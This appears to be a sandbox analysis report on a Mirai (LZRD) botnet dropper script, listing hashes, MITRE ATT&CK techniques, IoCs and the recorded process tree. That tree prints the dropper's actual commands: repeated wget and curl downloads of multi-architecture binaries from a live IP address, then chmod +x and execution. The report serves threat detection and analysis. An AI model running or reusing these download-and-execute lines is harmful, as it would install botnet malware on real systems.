mirai | 44442e1ac5df5c69852dc62e085146824a938b5c7e6032cecfbedf7ea0935e8f

Analysis

max time kernel
148s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
13-01-2025 07:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

(null).sh
Size

2KB
MD5

cdbe719571662353212a1d49312ba384
SHA1

0fbbad3d4b091eb0e953e781a7e7ba2c03659f53
SHA256

44442e1ac5df5c69852dc62e085146824a938b5c7e6032cecfbedf7ea0935e8f
SHA512

c6591539f6aa45036ce16a7572f37f361d3853f835f8575f5d63cb3af0666b7de7b5ea20bb08ab8b7d89619eb8e60295cc857e2f07dd67bb173d916b6c4352a2

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1621	chmod
1631	chmod
1661	chmod
1529	chmod
1539	chmod
1569	chmod
1579	chmod
1611	chmod
1549	chmod
1559	chmod
1591	chmod
1651	chmod
1641	chmod
1515	chmod
1601	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Space	1516	Space
/tmp/Space	1530	Space
/tmp/Space	1540	Space
/tmp/Space	1550	Space
/tmp/Space	1560	Space
/tmp/Space	1570	Space
/tmp/Space	1580	Space
/tmp/Space	1592	Space
/tmp/Space	1602	Space
/tmp/Space	1612	Space
/tmp/Space	1622	Space
/tmp/Space	1632	Space
/tmp/Space	1642	Space
/tmp/Space	1652	Space
/tmp/Space	1662	Space

Modifies Watchdog functionality 1 TTPs 28 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 28 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-5.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1605/status	Space
File opened for reading	/proc/79/status	Space
File opened for reading	/proc/159/status	Space
File opened for reading	/proc/1368/status	Space
File opened for reading	/proc/24/status	Space
File opened for reading	/proc/1136/status	Space
File opened for reading	/proc/36/status	Space
File opened for reading	/proc/1025/status	Space
File opened for reading	/proc/13/status	Space
File opened for reading	/proc/1583/status	Space
File opened for reading	/proc/7/status	Space
File opened for reading	/proc/973/status	Space
File opened for reading	/proc/685/status	Space
File opened for reading	/proc/1565/status	Space
File opened for reading	/proc/11/status	Space
File opened for reading	/proc/1144/status	Space
File opened for reading	/proc/1501/status	Space
File opened for reading	/proc/1615/status	Space
File opened for reading	/proc/36/status	Space
File opened for reading	/proc/172/status	Space
File opened for reading	/proc/490/status	Space
File opened for reading	/proc/1622/status	Space
File opened for reading	/proc/550/status	Space
File opened for reading	/proc/1199/status	Space
File opened for reading	/proc/724/status	Space
File opened for reading	/proc/166/status	Space
File opened for reading	/proc/1597/status	Space
File opened for reading	/proc/1553/status	Space
File opened for reading	/proc/981/status	Space
File opened for reading	/proc/81/status	Space
File opened for reading	/proc/1030/status	Space
File opened for reading	/proc/2/status	Space
File opened for reading	/proc/1250/status	Space
File opened for reading	/proc/238/status	Space
File opened for reading	/proc/674/status	Space
File opened for reading	/proc/952/status	Space
File opened for reading	/proc/1140/status	Space
File opened for reading	/proc/34/status	Space
File opened for reading	/proc/28/status	Space
File opened for reading	/proc/1176/status	Space
File opened for reading	/proc/1647/status	Space
File opened for reading	/proc/1089/status	Space
File opened for reading	/proc/89/status	Space
File opened for reading	/proc/89/status	Space
File opened for reading	/proc/8/status	Space
File opened for reading	/proc/198/status	Space
File opened for reading	/proc/1351/status	Space
File opened for reading	/proc/83/status	Space
File opened for reading	/proc/153/status	Space
File opened for reading	/proc/1161/status	Space
File opened for reading	/proc/1175/status	Space
File opened for reading	/proc/168/status	Space
File opened for reading	/proc/476/status	Space
File opened for reading	/proc/1563/status	Space
File opened for reading	/proc/168/status	Space
File opened for reading	/proc/34/status	Space
File opened for reading	/proc/550/status	Space
File opened for reading	/proc/79/status	Space
File opened for reading	/proc/1196/status	Space
File opened for reading	/proc/1080/status	Space
File opened for reading	/proc/1545/status	Space
File opened for reading	/proc/421/status	Space
File opened for reading	/proc/1162/status	Space
File opened for reading	/proc/643/status	Space

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1556	wget
1557	curl
1566	wget
1567	curl

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Space.m68k	curl
File opened for modification	/tmp/Space.x86	curl
File opened for modification	/tmp/Space.arm	wget
File opened for modification	/tmp/Space.arm7	curl
File opened for modification	/tmp/Space.mpsl	wget
File opened for modification	/tmp/Space.sh4	wget
File opened for modification	/tmp/Space.x86	wget
File opened for modification	/tmp/Space.arm5	curl
File opened for modification	/tmp/Space.ppc	curl
File opened for modification	/tmp/Space.arm6	wget
File opened for modification	/tmp/Space.x86_64	wget
File opened for modification	/tmp/Space.i686	wget
File opened for modification	/tmp/Space.mips	wget
File opened for modification	/tmp/Space.sh4	curl
File opened for modification	/tmp/Space	(null).sh
File opened for modification	/tmp/Space.sparc	curl
File opened for modification	/tmp/Space.m68k	wget
File opened for modification	/tmp/Space.mips64	curl
File opened for modification	/tmp/Space.mpsl	curl
File opened for modification	/tmp/Space.arm	curl
File opened for modification	/tmp/Space.arm6	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Space.arc	wget
File opened for modification	/tmp/Space.x86_64	curl
File opened for modification	/tmp/Space.arc	curl
File opened for modification	/tmp/Space.mips	curl
File opened for modification	/tmp/Space.arm5	wget
File opened for modification	/tmp/Space.i686	curl
File opened for modification	/tmp/Space.arm7	wget
File opened for modification	/tmp/Space.ppc	wget

/tmp/(null).sh
"/tmp/(null).sh"
1⤵
- Writes file to tmp directory
PID:1506
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1507
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:1508
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:1513
- /bin/cat
  cat Space.arc
  2⤵
  PID:1514
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:1516
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:1518
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/cat
  cat Space.x86
  2⤵
  PID:1528
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.x86 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1530
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1536
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1540
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:1546
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1550
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1556
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1557
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1560
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1566
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1567
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1569
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1570
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1576
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1577
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-OfEh9Q
  2⤵
  - File and Directory Permissions Modification
  PID:1579
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1580
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.arm
  2⤵
  - Writes file to tmp directory
  PID:1588
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.arm
  2⤵
  - Writes file to tmp directory
  PID:1589
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1591
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1592
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.arm5
  2⤵
  - Writes file to tmp directory
  PID:1598
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.arm5
  2⤵
  - Writes file to tmp directory
  PID:1599
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1601
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1602
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.arm6
  2⤵
  - Writes file to tmp directory
  PID:1608
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.arm6
  2⤵
  - Writes file to tmp directory
  PID:1609
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1611
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1612
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.arm7
  2⤵
  - Writes file to tmp directory
  PID:1618
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.arm7
  2⤵
  - Writes file to tmp directory
  PID:1619
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1621
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1622
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.ppc
  2⤵
  - Writes file to tmp directory
  PID:1628
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.ppc
  2⤵
  - Writes file to tmp directory
  PID:1629
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1631
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1632
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.sparc
  2⤵
  PID:1638
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.sparc
  2⤵
  - Writes file to tmp directory
  PID:1639
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1641
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1642
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.m68k
  2⤵
  - Writes file to tmp directory
  PID:1648
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.m68k
  2⤵
  - Writes file to tmp directory
  PID:1649
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1651
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1652
- /usr/bin/wget
  wget http://185.252.215.156/hiddenbin/Space.sh4
  2⤵
  - Writes file to tmp directory
  PID:1658
- /usr/bin/curl
  curl -O http://185.252.215.156/hiddenbin/Space.sh4
  2⤵
  - Writes file to tmp directory
  PID:1659
- /bin/chmod
  chmod +x busybox config-err-C9zgZS netplan_yfbt283b "(null).sh" snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64 ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH
  2⤵
  - File and Directory Permissions Modification
  PID:1661
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1662

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Space

Filesize
39KB

MD5
1bec59130f8371e22c47efb59a59c1d2

SHA1
83dbd00ae499ab03de65a8c1fb126288f352c556

SHA256
620c07348a54a516b1832fc569e483b52d7961c6e1338ab97028a23ea84aa17f

SHA512
e05daf723959bfcfc6577c4052416590955399c738fbe8d296a2256d73fb3bc910d14d611c4cfcc84816d7333927b7a4ac22f5bd3a9d5442c48fd99d13a9ecaa

Download Submit
/tmp/Space.arc

Filesize
113KB

MD5
99c7cca9cfb73b38c64bfc91df469854

SHA1
a257b20319bc08c6dc7ec6a3e79e32331225a01c

SHA256
82cbbc182ce722c660155fb3f1c5a82d075980e71cec7392cd13dc25821fb29d

SHA512
226593a9eefe30b5de03fe01e75cfcd774cd9de5f31215ca6aa39b52bf08f99eb9189005c000f29da1eb0170226b9888439753c5bf07f715dcaa0d14ddd9c603

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads